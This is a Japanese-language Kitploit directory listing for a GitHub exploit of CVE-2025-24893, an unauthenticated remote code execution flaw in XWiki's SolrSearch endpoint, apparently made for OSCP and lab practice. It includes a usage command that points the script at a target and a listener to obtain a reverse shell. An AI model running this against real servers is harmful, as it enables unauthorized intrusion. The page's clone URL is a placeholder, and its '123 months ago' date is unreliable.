Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-24893 — Linux XWiki向けOSCPライクなCVE-2025-24893エクスプロイト | Kitploit
ツール/GitHubGitHub/vasilysaint/cve-2025-24893
エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育リモートアクセスツールラボと実践
GitHubvasilysaint/cve-2025-24893

CVE-2025-24893

Linux XWiki向けOSCPライクなCVE-2025-24893エクスプロイト

リポジトリを見る
123ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-24893

XWiki Platformは、その上に構築されたアプリケーションにランタイムサービスを提供する汎用ウィキプラットフォームです。SolrSearchエンドポイントの脆弱性により、認証されていないユーザーが任意のリモートコード実行を達成できます。この脆弱性は、XWikiインストール全体の機密性、完全性、可用性に影響を与えます。

CVE: CVE-2025-24893


デモ

エクスプロイトのデモを以下に示します:

ターミナルデモ

使用方法

このエクスプロイトを使用するには、以下の手順に従ってください:

  1. リポジトリをクローン: git clone https://github.com/yourusername/CVE-2025-24893.git
  2. クローンしたディレクトリに移動: cd CVE-2025-24893
  3. 必要な依存関係をインストール: pip install requests
  4. エクスプロイトを実行:
root@kitploit:~
./CVE-2025-24893_linux-xwiki-exploit.py  -t http(s)://[target]:(port) -l [Listener IP] -p [Listener PORT] [-hp [Local HTTP PORT]]

このエクスプロイトについて

このエクスプロイトは、CVE-2025-24893で説明されているリモートコード実行の脆弱性を実証し、認証されていないユーザーが脆弱なLinuxベースのXWikiインストール上でリバースシェルを取得することを可能にします。

私は元々、OSCP準備ラボやHack The Boxなどのトレーニング環境で使用するためにこのツールを開発しました。そこでは、脆弱性を再現するためのシンプルで信頼性の高い方法が必要でした。既存のツールが要件を満たしていなかったため、自作することにしました。

CVE-2025-24893はサポート対象のXWikiリリースではずっと前に修正されていますが、このエクスプロイトは、自分が所有するシステムまたは明示的にテストを許可されたシステムに対してのみ使用してください。

作者は、本ソフトウェアの誤用またはその使用に起因するいかなる損害についても一切の責任を負いません。

免責事項

このツールは教育目的および許可されたセキュリティ評価専用です。

自分が所有するシステムまたは明示的にテストを許可されたシステムに対してのみ使用してください。作者は、本ソフトウェアの誤用またはその使用に起因するいかなる損害についても一切の責任を負いません。

コントリビューション

コントリビューションを歓迎します。

バグを発見した場合、改善の提案がある場合、または追加のペイロード、プラットフォーム、機能のサポートを追加したい場合は、遠慮なくIssueを開くかプルリクエストを送信してください。

建設的なフィードバック、テストレポート、コードのコントリビューションは大変感謝されます。

ツールをダウンロード